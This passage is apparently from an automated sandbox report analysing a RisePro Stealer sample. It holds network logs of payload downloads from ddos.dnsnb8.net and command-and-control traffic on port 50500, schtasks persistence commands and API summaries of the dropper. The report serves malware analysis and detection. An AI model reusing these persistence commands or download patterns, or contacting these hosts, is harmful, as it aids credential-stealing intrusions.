Jul 25, 2024 04:53:36.239554882 CEST	49720	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:36.239727020 CEST	49720	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:36.244540930 CEST	799	49720	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:36.819010019 CEST	799	49720	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:36.819031954 CEST	799	49720	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:36.819099903 CEST	49720	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:36.819117069 CEST	799	49720	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:36.819149017 CEST	49720	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:36.820502996 CEST	49720	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:36.825462103 CEST	799	49720	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:36.849215984 CEST	49719	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:36.854238033 CEST	50500	49719	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:38.718920946 CEST	50500	49706	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:38.719118118 CEST	49706	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:39.497484922 CEST	49721	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:39.502538919 CEST	799	49721	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:39.502651930 CEST	49721	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:39.504205942 CEST	49721	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:39.509083986 CEST	799	49721	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:39.900060892 CEST	799	49721	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:39.900149107 CEST	49721	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:39.915069103 CEST	799	49721	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:39.915142059 CEST	49721	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:39.916049957 CEST	49721	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:39.920783997 CEST	799	49721	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:42.296803951 CEST	49722	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:42.301835060 CEST	799	49722	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:42.301956892 CEST	49722	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:42.302660942 CEST	49722	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:42.307512045 CEST	799	49722	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:42.698484898 CEST	799	49722	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:42.698620081 CEST	799	49722	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:42.698687077 CEST	49722	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:42.698687077 CEST	49722	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:42.699848890 CEST	49722	799	192.168.2.8	44.221.84.105
Jul 25, 2024 04:53:42.704643965 CEST	799	49722	44.221.84.105	192.168.2.8
Jul 25, 2024 04:53:44.054110050 CEST	50500	49712	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:44.054214954 CEST	49712	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:44.074085951 CEST	50500	49713	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:44.074186087 CEST	49713	50500	192.168.2.8	193.233.132.62
Jul 25, 2024 04:53:55.232369900 CEST	50500	49719	193.233.132.62	192.168.2.8
Jul 25, 2024 04:53:55.232434988 CEST	49719	50500	192.168.2.8	193.233.132.62

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 04:53:12.283926964 CEST	63806	53	192.168.2.8	1.1.1.1
Jul 25, 2024 04:53:12.378849983 CEST	53	63806	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 04:53:12.283926964 CEST	192.168.2.8	1.1.1.1	0x8891	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 04:53:12.378849983 CEST	1.1.1.1	192.168.2.8	0x8891	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	44.221.84.105	799	1840	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:12.499470949 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	44.221.84.105	799	1840	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:16.374454975 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49717	44.221.84.105	799	7588	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:30.109827995 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	44.221.84.105	799	7588	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:33.321059942 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	44.221.84.105	799	7588	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:36.239727020 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	44.221.84.105	799	7588	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:39.504205942 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	44.221.84.105	799	7588	C:\Users\user\AppData\Local\Temp\MlpxPf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:53:42.302660942 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	22:53:09
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe"
Imagebase:	0x270000
File size:	2'447'360 bytes
MD5 hash:	6A672BBDC7865A7518441284D853F8D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	22:53:10
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
Imagebase:	0x350000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:53:15
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0x70000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:53:15
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:53:15
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0x70000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:53:15
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:53:16
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0x830000
File size:	2'447'360 bytes
MD5 hash:	6A672BBDC7865A7518441284D853F8D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	22:53:16
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0x830000
File size:	2'447'360 bytes
MD5 hash:	6A672BBDC7865A7518441284D853F8D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	22:53:16
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:53:26
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase:	0x930000
File size:	2'447'360 bytes
MD5 hash:	6A672BBDC7865A7518441284D853F8D8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	22:53:27
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\MlpxPf.exe
Imagebase:	0x590000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:53:45
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:53:45
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	7.6%
Total number of Nodes:	263
Total number of Limit Nodes:	26

Executed Functions

Function 00847044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00847223
WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00847252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00847256
WinExec.KERNEL32(?,00000005), ref: 00847262

Strings

Clos, xrefs: 00847129
Kern, xrefs: 008470F4
lstr, xrefs: 008471A7
Crea, xrefs: 00847169
athA, xrefs: 00847199
GetT, xrefs: 00847188
WinE, xrefs: 00847110
GetM, xrefs: 008470B6
dleA, xrefs: 008470D0
el32, xrefs: 008470FB
Writ, xrefs: 00847148
.dll, xrefs: 00847102
catA, xrefs: 008471AF
odul, xrefs: 0084722D
MlpxPf.exe, xrefs: 008471FD, 00847200

Memory Dump Source

Source File: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-650681566
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: cb57bf31179a4563337c55b44a99fda849dd5b2aa6230865fc7041e297810689
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 81611574D0521EDBCF24CFA4C884AADFBB4FF58315F2586AAD506AB601C3749E81CB91

Function 0028DB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0028DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
closesocket.WS2_32(00000000), ref: 0028DC4D

Strings

`4u, xrefs: 0028DC1E
50500, xrefs: 0028DBE8

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500$`4u
API String ID: 3098855095-1883443620
Opcode ID: 174f5230b010d1301cce1b0cc05fd2b4fbca897717d8a0d382bae3951e1254d9
Instruction ID: 6cb2226766ddce0cb454cd45ce74d96979f895e74c0af58d51b93e5d9776fcdc
Opcode Fuzzy Hash: 174f5230b010d1301cce1b0cc05fd2b4fbca897717d8a0d382bae3951e1254d9
Instruction Fuzzy Hash: 8131C1766153456BC6209F289C84B3BB7E5EF89734F005F1EF9A8932E0E37099198792

Function 04E80C47 Relevance: 1.7, APIs: 1, Instructions: 153COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 6d75ac4b0fa0e0286ec07f1ccb0f092322cbf1b28ababa86227565d58fa213be
Instruction ID: e1da9323d75453a8a47dc36b6a7942118c10bc20ccebf439565f0545bba732d4
Opcode Fuzzy Hash: 6d75ac4b0fa0e0286ec07f1ccb0f092322cbf1b28ababa86227565d58fa213be
Instruction Fuzzy Hash: C5319EEB30C110BDFE52A5416B50AF7676DE7E6330732A46EF40FD5142F6946A4D6031

Function 0028EC20 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 265
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(0000037C,0000FFFF,00001006,?,00000008), ref: 0028ECC7
recv.WS2_32(?,00000004,00000002), ref: 0028ECE1
recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0028ED4E
recv.WS2_32(00000000,0000000C,00000008), ref: 0028ED6F
recv.WS2_32(00000000,?,00000008), ref: 0028EE0C

Part of subcall function 0028DB60: WSAStartup.WS2_32 ref: 0028DB8B
Part of subcall function 0028DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
Part of subcall function 0028DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
Part of subcall function 0028DB60: closesocket.WS2_32(00000000), ref: 0028DC4D

recv.WS2_32(?,00000004,00000008), ref: 0028F033
Sleep.KERNELBASE(00000001), ref: 0028F09E
Sleep.KERNELBASE(00000064), ref: 0028F0AC
__Mtx_unlock.LIBCPMT ref: 0028F211

Strings

t;:, xrefs: 0028EC7A
50500, xrefs: 0028EC75

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
String ID: 50500$t;:
API String ID: 2930922264-3732158975
Opcode ID: a440701467b17683e6cee363dc9ec1ef343da2f20baaa8face3f351cb6128665
Instruction ID: 62f18a2818f03e37c7e57e2c372ef1de44f21383349697dda9d50359d658affc
Opcode Fuzzy Hash: a440701467b17683e6cee363dc9ec1ef343da2f20baaa8face3f351cb6128665
Instruction Fuzzy Hash: CBB1DF31D11259CFEB21EFA8CC85BADBBB5FF06300F248219E444AB2D2D7706995CB50

Function 0028E060 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 333
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,003747E8,00000000,00000000,-003A65B0), ref: 0028E3A6

Strings

;:, xrefs: 0028E525
ta:, xrefs: 0028F1CA
t;:, xrefs: 0028EC7A
Ws2_32.dll, xrefs: 0028E37D
131, xrefs: 0028F2C8
\;:, xrefs: 0028EB85
50500, xrefs: 0028EC75

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

